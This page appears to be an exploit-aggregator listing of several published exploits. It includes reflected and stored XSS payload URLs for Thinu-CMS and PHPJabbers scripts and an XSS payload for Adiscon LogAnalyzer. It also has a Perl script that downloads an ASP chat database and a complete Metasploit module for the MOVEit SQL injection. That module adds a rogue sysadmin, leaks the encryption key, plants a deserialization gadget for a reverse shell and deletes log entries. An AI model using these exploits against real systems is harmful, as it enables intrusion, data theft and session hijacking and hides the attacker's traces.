Latest exploits :: CodePwn

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.codester.com/items/40401/ │ │ Vendor : Thinu Tech │ │ Software : Thinu-CMS Blog System 1.5 │ │ Vuln Type: Reflected XSS - Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ Reflected XSS │ │ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ │ │ │ Stored XSS │ │ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /author_posts.php GET 'author' parameter is vulnerable to RXSS http://website/author_posts.php?author=g6g12<script>alert(1)</script>o8sdm&p_id=195 ## Stored XSS ----------------------------------------------- POST /contact.php HTTP/1.1 name=[XSS Payload]&email=anything@email.com&subject=AnySubject&body=[XSS Payload]&submit=Submit+ ----------------------------------------------- POST parameter 'name' is vulnerable to XSS POST parameter 'body' is vulnerable to XSS ## Steps to Reproduce: ################################################################################################# 1. Visit [Contact US] Page on this Path (http://website/contact.php) 2. Inject your [XSS Payload] in "User" 3. Inject your [XSS Payload] in "Message Box" 4. Press Submit 8. When ADMIN check [Contacts] in Administration Panel on this Path (https://website/admin/contacts.php) 9. XSS Will Fire and Executed on his Browser [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.phpjabbers.com/php-forum-script/ │ │ Vendor : PHPJabbers │ │ Software : PHPJabbers Forum Script 3.0 │ │ Vuln Type: Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## Stored XSS ----------------------------------------------- POST /1687474733_118/preview.php?controller=pjLoad&action=pjActionAsk HTTP/1.1 ask_question=1&name=[XSS Payload]&email=cracker@infosec.com&question=[XSS Payload]&description=[XSS Payload]&category_id=3 ----------------------------------------------- POST parameter 'name' is vulnerable to XSS POST parameter 'question' is vulnerable to XSS POST parameter 'description' is vulnerable to XSS ## Steps to Reproduce: 1. Click on [+ New Question](as Guest) 2. Inject your [XSS Payload] in "Full name" 3. Inject your [XSS Payload] in "Question" 4. Inject your [XSS Payload] in "Description" 5. Select any [Category] 6. Save (=Submit) 5. When ADMIN Visit the [Questions] to Check [New Questions] on this Path (https://website/index.php?controller=pjAdminQuestions&action=pjActionIndex) in administration Panel 6. XSS will Fire & Executed on his Browser 7. Anyone visit your [Question Post] XSS will Fire & Executed on his Browser [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.phpjabbers.com/php-forum-script/ │ │ Vendor : PHPJabbers │ │ Software : PHPJabbers Forum Script 3.0 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /preview.php URL parameter is vulnerable to RXSS https://website/preview.php/xmbfr"><script>alert(1)</script>bqptl?controller=pjLoad&action=pjActionIndex&category_id=1 Path: /preview.php GET parameter 'action' is vulnerable to RXSS https://website/preview.php?controller=pjLoad&action=pjActionIndexje35u%3cimg%20src%3da%20onerror%3dalert(1)%3eo5ycr&category_id=1 Path: /preview.php GET parameter 'column' is vulnerable to RXSS https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created%00undzx%3cscript%3ealert(1)%3c%2fscript%3eqqfc9&direction=DESC&keyword= Path: /preview.php GET parameter 'direction' is vulnerable to RXSS https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESCm1al6%22%3e%3cscript%3ealert(1)%3c%2fscript%3evwg49&keyword= Path: /preview.php GET parameter 'keyword' is vulnerable to RXSS https://website/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=v467i%22%3e%3cscript%3ealert(1)%3c%2fscript%3ek9pxe [-] Done </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'MOVEit SQL Injection vulnerability', 'Description' => %q{ This module exploits an SQL injection vulnerability in the MOVEit Transfer web application that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker can leverage an information leak be able to upload a .NET deserialization payload. }, 'License' => MSF_LICENSE, 'Author' => [ 'sfewer-r7', # PoC https://github.com/sfewer-r7/CVE-2023-34362 'rbowes-r7', # research 'bwatters-r7' # module ], 'References' => [ ['CVE', '2023-34362' ], ['URL', 'https://github.com/sfewer-r7/CVE-2023-34362'], ['URL', 'https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis'], ['URL', 'https://www.wiz.io/blog/cve-2023-34362'] ], 'Platform' => 'win', 'Arch' => [ARCH_CMD], 'Payload' => { 'Space' => 345 }, 'Targets' => [ [ 'Windows Command', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp', 'RPORT' => 443, 'SSL' => true } } ], ], 'DisclosureDate' => '2023-05-31', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'Reliability' => [ REPEATABLE_SESSION ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ] } ) ) register_options( [ Msf::OptString.new('TARGET_URI', [ false, 'Target URI', '/api/v1/token']), Msf::OptString.new('USERNAME', [ true, 'Username', Rex::Text.rand_text_alphanumeric(5..11)]), Msf::OptString.new('LOGIN_NAME', [ true, 'Login Name', Rex::Text.rand_text_alphanumeric(5..11)]), Msf::OptString.new('PASSWORD', [ true, 'Password', Rex::Text.rand_text_alphanumeric(5..11)]) ] ) @moveit_token = nil @moveit_instid = nil @guest_email_addr = "#{Rex::Text.rand_text_alphanumeric(5..12)}@#{Rex::Text.rand_text_alphanumeric(3..6)}.com" @uploadfile_name = Rex::Text.rand_text_alphanumeric(8..15) @uploadfile_size = rand(5..64) @uploadfile_data = Rex::Text.rand_text_alphanumeric(@uploadfile_size) @user_added = false @files_json = nil end def begin_file_upload(folders_json, token_json) boundary = rand_text_numeric(27) post_data = "--#{boundary}\r\n" post_data << "Content-Disposition: form-data; name=\"name\"\r\n\r\n#{@uploadfile_name}\r\n--#{boundary}\r\n" post_data << "Content-Disposition: form-data; name=\"size\"\r\n\r\n#{@uploadfile_size}\r\n--#{boundary}\r\n" post_data << "Content-Disposition: form-data; name=\"comments\"\r\n\r\n\r\n--#{boundary}--\r\n" res = send_request_raw({ 'method' => 'POST', 'uri' => normalize_uri("/api/v1/folders/#{folders_json['items'][0]['id']}/files?uploadType=resumable"), 'headers' => { 'Content-Type' => 'multipart/form-data; boundary=' + boundary, 'Authorization' => "Bearer #{token_json['access_token']}" }, 'connection' => 'close', 'accept' => '*/*', 'data' => post_data.to_s }) fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #1 (#{files_response.body})") if res.nil? || res.code != 200 files_json = res.get_json_document vprint_status("Initiated resumable file upload for fileId '#{files_json['fileId']}'...") files_json end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('moveitisapi/moveitisapi.dll?action=capa'), 'connection' => 'close', 'accept' => '*/*' }) version = nil if res && res.code == 200 && res.headers.key?('X-MOVEitISAPI-Version') version = Rex::Version.new(res.headers['X-MOVEitISAPI-Version']) # 2020.1.x AKA 12.1.x return Exploit::CheckCode::Appears if version >= Rex::Version.new('12.1.0') && version < Rex::Version.new('12.1.10') # 2021.0.x AKA 13.0.x return Exploit::CheckCode::Appears if version >= Rex::Version.new('13.0.0') && version < Rex::Version.new('13.0.8') # 2021.1.x AKA 13.1.x return Exploit::CheckCode::Appears if version >= Rex::Version.new('13.1.0') && version < Rex::Version.new('13.1.6') # 2022.0.x AKA 14.0.x return Exploit::CheckCode::Appears if version >= Rex::Version.new('14.0.0') && version < Rex::Version.new('14.0.6') # 2022.1.x AKA 14.1.x return Exploit::CheckCode::Appears if version >= Rex::Version.new('14.1.0') && version < Rex::Version.new('14.1.7') # 2023.0.x AKA 15.0.x return Exploit::CheckCode::Appears if version >= Rex::Version.new('15.0.0') && version < Rex::Version.new('15.0.3') else return Exploit::CheckCode::Safe end return Exploit::CheckCode::Unknown end def cleanup cleanup_user(@files_json) if @user_added super end def cleanup_user(files_json) hax_username = datastore['USERNAME'] hax_loginname = datastore['LOGIN_NAME'] deleteuser_payload = [ "DELETE FROM moveittransfer.fileuploadinfo WHERE FileID='#{files_json['fileId']}'", # delete the deserialization payload "DELETE FROM moveittransfer.files WHERE UploadUsername='#{hax_username}'", # delete the file we uploaded "DELETE FROM moveittransfer.activesessions WHERE Username='#{hax_username}'", # "DELETE FROM moveittransfer.users WHERE Username='#{hax_username}'", # delete the user account we created "DELETE FROM moveittransfer.log WHERE Username='#{hax_username}'", # The web ASP stuff logs by username "DELETE FROM moveittransfer.log WHERE Username='#{hax_loginname}'", # The API logs by loginname "DELETE FROM moveittransfer.log WHERE Username='Guest:#{@guest_email_addr}'", # The SQLi generates a guest log entry. ] if @user_added vprint_status("Deleting user #{hax_username}") sqli(sqli_payload(deleteuser_payload)) @user_added = false end end def create_sysadmin hax_username = datastore['USERNAME'] hax_password = datastore['PASSWORD'] hax_loginname = datastore['LOGIN_NAME'] createuser_payload = [ "UPDATE moveittransfer.hostpermits SET Host='*.*.*.*' WHERE Host!='*.*.*.*'", "INSERT INTO moveittransfer.users (Username) VALUES ('#{hax_username}')", "UPDATE moveittransfer.users SET LoginName='#{hax_loginname}' WHERE Username='#{hax_username}'", "UPDATE moveittransfer.users SET InstID='#{@moveit_instid}' WHERE Username='#{hax_username}'", "UPDATE moveittransfer.users SET Password='#{makev1password(hax_password, Rex::Text.rand_text_alphanumeric(4))}' WHERE Username='#{hax_username}'", "UPDATE moveittransfer.users SET Permission='40' WHERE Username='#{hax_username}'", "UPDATE moveittransfer.users SET CreateStamp=NOW() WHERE Username='#{hax_username}'", ] res = sqli(sqli_payload(createuser_payload)) fail_with(Msf::Exploit::Failure::Unknown, "Couldn't perform initial SQLi (#{res.body})") if res.code != 200 @user_added = true end def encrypt_deserialization_gadget(gadget, org_key) org_key = org_key.gsub(' ', '') org_key = [org_key].pack('H*').bytes.pack('C*') deserialization_gadget = moveitv2encrypt(gadget, org_key) deserialization_gadget end def find_folder_id(token_json) folders_response = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('/api/v1/folders'), 'connection' => 'close', 'accept' => '*/*', 'headers' => { 'Authorization' => "Bearer #{token_json['access_token']}" } }) fail_with(Msf::Exploit::Failure::Unknown, "Couldn't get API folders (#{folders_response.body})") if folders_response.nil? || folders_response.code != 200 folders_json = JSON.parse(folders_response.body) vprint_status("Found folderId '#{folders_json['items'][0]['id']}'.") folders_json end def get_csrf_token(res) fail_with(Msf::Exploit::Failure::Unknown, 'No csrf token, or my code is bad') unless res.to_s.split(/\n/).join =~ /.*csrftoken" value="([a-f0-9]*)"/ ::Regexp.last_match(1) end def guestaccess_request(body) res = send_request_cgi({ 'method' => 'POST', 'keep_cookies' => true, 'uri' => normalize_uri('guestaccess.aspx'), 'connection' => 'close', 'accept' => '*/*', 'vars_post' => body }) res end # Perform a request to the ISAPI endpoint with an arbitrary transaction def isapi_request(transaction, headers) send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('moveitisapi/moveitisapi.dll?action=m2'), 'keep_cookies' => true, 'connection' => 'close', 'accept' => '*/*', 'headers' => { 'X-siLock-Test': 'abcdX-SILOCK-Transaction: folder_add_by_path', 'X-siLock-Transaction': transaction }.merge(headers) }) end def leak_encryption_key(token_json, files_json) haxleak_payload = [ # The \ gets escaped, so we leverage CHAR_LENGTH(39) to get the key we want (Standard Networks\siLock\Institutions\0) as all other KeyName's will be longer (Standard Networks\siLock\Institutions\1234) "UPDATE moveittransfer.files SET UploadAgentBrand=(SELECT PairValue FROM moveittransfer.registryaudit WHERE PairName='Key' AND CHAR_LENGTH(KeyName)=#{'Standard Networks\siLock\Institutions\0'.length}) WHERE ID='#{files_json['fileId']}'" ] sqli(sqli_payload(haxleak_payload)) leak_response = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("/api/v1/files/#{files_json['fileId']}"), 'connection' => 'close', 'accept' => '*/*', 'headers' => { 'Authorization' => "Bearer #{token_json['access_token']}" } }) fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #LEAK (#{leak_response.body})") if leak_response.nil? || leak_response.code != 200 leak_json = JSON.parse(leak_response.body) org_key = leak_json['uploadAgentBrand'] vprint_status("Leaked the Org Key: #{org_key}") org_key end def makev1password(password, salt = 'AAAA') fail_with(Msf::Exploit::Failure::BadConfig, 'password cannot be empty') if password.empty? fail_with(Msf::Exploit::Failure::BadConfig, 'salt must be 4 bytes') if salt.length != 4 # These two hardcoded values are found in MOVEit.DMZ.Core.Cryptography.Providers.SecretProvider.GetSecret pwpre = Base64.decode64('=VT2jkEH3vAs=') pwpost = Base64.decode64('=0maaSIA5oy0=') md5 = Digest::MD5.new md5.update(pwpre) md5.update(salt) md5.update(password) md5.update(pwpost) pw = [(4 + 4 + 16), 0, 0, 0].pack('CCCC') pw << salt pw << md5.digest return Base64.strict_encode64(pw).gsub('+', '-') end def moveitv2encrypt(data, org_key, iv = nil, tag = '@%!') fail_with(Msf::Exploit::Failure::BadConfig, 'org_key must be 16 bytyes') if org_key.length != 16 if iv.nil? iv = Rex::Text.rand_text_alphanumeric(4) # as we only store the first 4 bytes in the header, the IV must be a repeating 4 byte sequence. iv *= 4 end # MOVEit.DMZ.Core.Cryptography.Encryption key = [64, 131, 232, 51, 134, 103, 230, 30, 48, 86, 253, 157].pack('C*') key += org_key key += [0, 0, 0, 0].pack('C*') # MOVEit.Crypto.AesMOVEitCryptoTransform cipher = OpenSSL::Cipher.new('AES-256-CBC') cipher.encrypt cipher.key = key cipher.iv = iv encrypted_data = cipher.update(data) + cipher.final data_sha1_hash = Digest::SHA1.digest(data).unpack('C*') org_key_sha1_hash = Digest::SHA1.digest(org_key).unpack('C*') # MOVEit.DMZ.Core.Cryptography.Providers.MOVEit.MOVEitV2EncryptedStringHeader header = [ 225, # MOVEitV2EncryptedStringHeader 0, data_sha1_hash[0], data_sha1_hash[1], org_key_sha1_hash[0], org_key_sha1_hash[1], org_key_sha1_hash[2], org_key_sha1_hash[3], iv.unpack('C*')[0], iv.unpack('C*')[1], iv.unpack('C*')[2], iv.unpack('C*')[3], ].pack('C*') # MOVEit.DMZ.Core.Cryptography.Encryption return tag + Base64.strict_encode64(header + encrypted_data) end def populate_token_instid begin res = send_request_cgi({ 'method' => 'GET', 'keep_cookies' => true, 'connection' => 'keep-alive', 'accept' => '*/*' }) cookies = res.get_cookies # Get the session id from the cookies fail_with(Msf::Exploit::Failure::Unknown, 'Could not find token from cookies!') unless cookies =~ /ASP.NET_SessionId=([a-z0-9]+);/ @moveit_token = ::Regexp.last_match(1) vprint_status("Received ASP.NET_SessionId cookie: #{@moveit_token}") # Get the InstID from the cookies fail_with(Msf::Exploit::Failure::Unknown, 'Could not find InstID from cookies!') unless cookies =~ /siLockLongTermInstID=([0-9]+);/ @moveit_instid = ::Regexp.last_match(1) vprint_status("Received siLockLongTermInstID cookie: #{@moveit_instid}") end true end def request_api_token res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('/api/v1/token'), 'Content-Type' => 'application/x-www-form-urlencoded', 'connection' => 'keep-alive', 'accept' => '*/*', 'vars_post' => { 'grant_type' => 'password', 'username' => datastore['LOGIN_NAME'], 'password' => datastore['PASSWORD'] } }) fail_with(Msf::Exploit::Failure::Unknown, "Couldn't get API token (#{res.body})") if res.code != 200 token_json = JSON.parse(res.body) vprint_status("Got API access token='#{token_json['access_token']}'.") token_json end def set_session(session_hash) session_vars = {} session_index = 0 session_hash.each_pair do |k, v| session_vars["X-siLock-SessVar#{session_index}"] = "#{k}: #{v}" session_index += 1 end isapi_request('session_setvars', session_vars) end def sqli(sql_payload) # Set up a fake package in the session. The order here is important. We set these session # variables one per request, so first set the package information, then switch over to a # 'Guest' username to allow the CSRF/injection to work as expected. If we don't do this # order the session will be cleared and the injection will not work. set_session({ 'MyPkgAccessCode' => 'accesscode', # Must match the final request Arg06 'MyPkgID' => '0', # Is self provisioned? (must be 0) 'MyGuestEmailAddr' => @guest_email_addr, # Must be a valid email address @ MOVEit.DMZ.ClassLib.dll/MOVEit.DMZ.ClassLib/MsgEngine.cs 'MyPkgInstID' => '1234', # this can be any int value 'MyPkgSelfProvisionedRecips' => sql_payload, 'MyUsername' => 'Guest' }) # Get a CSRF token - this has to be *after* you set MyUsername, since the # username is incorporated into it # # Transaction => request type, different types will work # Arg06 => the package access code (must match what's set above) # Arg12 => promptaccesscode requests a form, which contains a CSRF code body = { 'Transaction' => 'dummy', 'Arg06' => 'accesscode', 'Arg12' => 'promptaccesscode' } csrf = get_csrf_token(guestaccess_request(body)) # This does the actual injection body = { 'Arg06' => 'accesscode', 'transaction' => 'secmsgpost', 'Arg01' => 'subject', 'Arg04' => 'body', 'Arg05' => 'sendauto', 'Arg09' => 'pkgtest9', 'csrftoken' => csrf } guestaccess_request(body) end def sqli_payload(sql_payload) # Create the initial injection, and create the session object payload = [ # The initial injection "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.com')", ].concat(sql_payload) # Join our payload, and terminate with a comment character return payload.join(';') + ';#' end def trigger_deserialization(token_json, files_json, folders_json) files_response = send_request_cgi({ 'method' => 'PUT', 'uri' => normalize_uri("/api/v1/folders/#{folders_json['items'][0]['id']}/files?uploadType=resumable&fileId=#{files_json['fileId']}"), 'connection' => 'close', 'accept' => '*/*', 'verify' => false, 'headers' => { 'Authorization' => "Bearer #{token_json['access_token']}", 'Content-Type' => 'application/octet-stream', 'Content-Range' => "bytes 0-#{@uploadfile_size - 1}/#{@uploadfile_size}", 'X-File-Hash' => Digest::SHA1.hexdigest(@uploadfile_data) }, 'data' => @uploadfile_data }) # 500 if payload runs :) fail_with(Msf::Exploit::Failure::Unknown, "Couldn't post API files #2 code=#{files_response.code} (#{files_response.body})") if files_response.code != 500 end def upload_encrypted_gadget(encrypted_gadget, files_json) haxupload_payload = [ "UPDATE moveittransfer.fileuploadinfo SET State='#{encrypted_gadget}' WHERE FileID='#{files_json['fileId']}'", ] vprint_status('Planting encrypted gadget into the DB...') sqli(sqli_payload(haxupload_payload)) end def exploit # Get the sessionID and siLockLongTermInstID print_status('[01/11] Get the sessionID and siLockLongTermInstID') populate_token_instid # Allow Remote Access and Create new sysAd print_status('[02/11] Create New Sysadmin') create_sysadmin print_status('[03/11] Get API Token') token_json = request_api_token print_status('[04/11] Get Folder ID') folders_json = find_folder_id(token_json) print_status('[05/11] Begin File Upload') @files_json = begin_file_upload(folders_json, token_json) print_status('[06/11] Leak Encryption Key') org_key = leak_encryption_key(token_json, @files_json) print_status('[07/11] Generate Gadget') gadget = ::Msf::Util::DotNetDeserialization.generate( payload.encoded, gadget_chain: :TextFormattingRunProperties, formatter: :BinaryFormatter ) print_status('[08/11] Encrypt Gadget') b64_gadget = Rex::Text.encode_base64(gadget) encrypted_gadget = encrypt_deserialization_gadget(b64_gadget, org_key) print_status('[09/11] Upload Encrypted Gadget') upload_encrypted_gadget(encrypted_gadget, @files_json) print_status('[10/11] Trigger Gadget') trigger_deserialization(token_json, @files_json, folders_json) print_status('[11/11] Cleaning Up') cleanup_user(@files_json) end end </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.phpjabbers.com/stiva-blog-script/ │ │ Vendor : PHPJabbers │ │ Software : PHPJabbers STIVA Blog Script 4.1 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /preview.php GET 'category_id' parameter is vulnerable to RXSS https://website/preview.php?controller=pjLoad&action=pjActionIndex&category_id=5qn281%22%3e%3cscript%3ealert(1)%3c%2fscript%3enjmk9 GET 'lid' parameter is vulnerable to RXSS https://website/preview.php?lid=umxpr"><script>alert(1)</script>dbyiw&pjPage=2 GET 'archive' parameter is vulnerable to RXSS https://website/preview.php?controller=pjLoad&action=pjActionIndex&dosearch=1&category_id=&archive=b5bzk%22%3e%3cscript%3ealert(1)%3c%2fscript%3em9gtp&keyword=123 GET 'keyword' parameter is vulnerable to RXSS https://website/preview.php?controller=pjLoad&action=pjActionIndex&dosearch=1&category_id=&archive=&keyword=123fcgbt%22%3e%3cscript%3ealert(1)%3c%2fscript%3eya0py URL parameter is vulnerable to RXSS https://website/preview.php/f76te"><script>alert(1)</script>cq8x2?controller=pjLoad&action=pjActionIndex&category_id=5 [-] Done </code></pre>

<pre><code>==================================================================================================================================== | # Title : Advanced ASP chat 2.0 Database Disclosure Exploit | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | | # Vendor : http://p30vel.ir | | # Dork : | ==================================================================================================================================== poc : [-] Download the database: The following Perl exploit will attempt to download the (acart.mdb ) file The (acart.mdb) It is the database and contains all the data . [+] Dorking İn Google Or Other Search Enggine. [+] save code as perl file : poc.pl [+] code : poc : [-] Download the database: The following Perl exploit will attempt to download the (acart.mdb ) file The (acart.mdb) It is the database and contains all the data . [+] Dorking İn Google Or Other Search Enggine. [+] save code as perl file : poc.pl [+] code : #!/usr/bin/perl -w # # Advanced ASP chat 2.0 Database Disclosure Exploit # # Author : indoushka # # Vondor : http://p30vel.ir use LWP::Simple; use LWP::UserAgent; system('cls'); print ('Advanced ASP chat 2.0 Database Disclosure Exploit'); system('color a'); if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } ($TargetIP, $path, $File,) = @ARGV; $File="acart.mdb"; my $url = "http://" . $TargetIP . $path . $File; print "\n Fuck you wait!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/acart.mdb"); if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/acart.mdb\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); } Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Adiscon LogAnalyzer V 4.1.5 Xss Vulnerability | | # Author : indoushka | | # Telegram : @indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : http://loganalyzer.adiscon.com/ | | # Dork : "Adiscon LogAnalyzer Version 4.1.5" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] use payload : /login.php?referer=/userchange.php%3Fop%3Dchangeview%22%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E%26viewid%3DSYSLOG [+] http://127.0.0.1/rsyslog.infogeniecm/login.php?referer=/userchange.php%3Fop%3Dchangeview%22%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E%26viewid%3DSYSLOG Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | ======================================================================================================================================= </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.phpjabbers.com/knowledge-base-builder/ │ │ Vendor : PHPJabbers │ │ Software : PHPJabbers Knowledge Base Builder 3.0 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /preview.php GET parameter 'action' is vulnerable to RXSS https://website/preview.php?controller=pjLoad&action=pjActionIndexd6941%3cimg%20src%3da%20onerror%3dalert(1)%3edas75&pjPage=2 [-] Done </code></pre>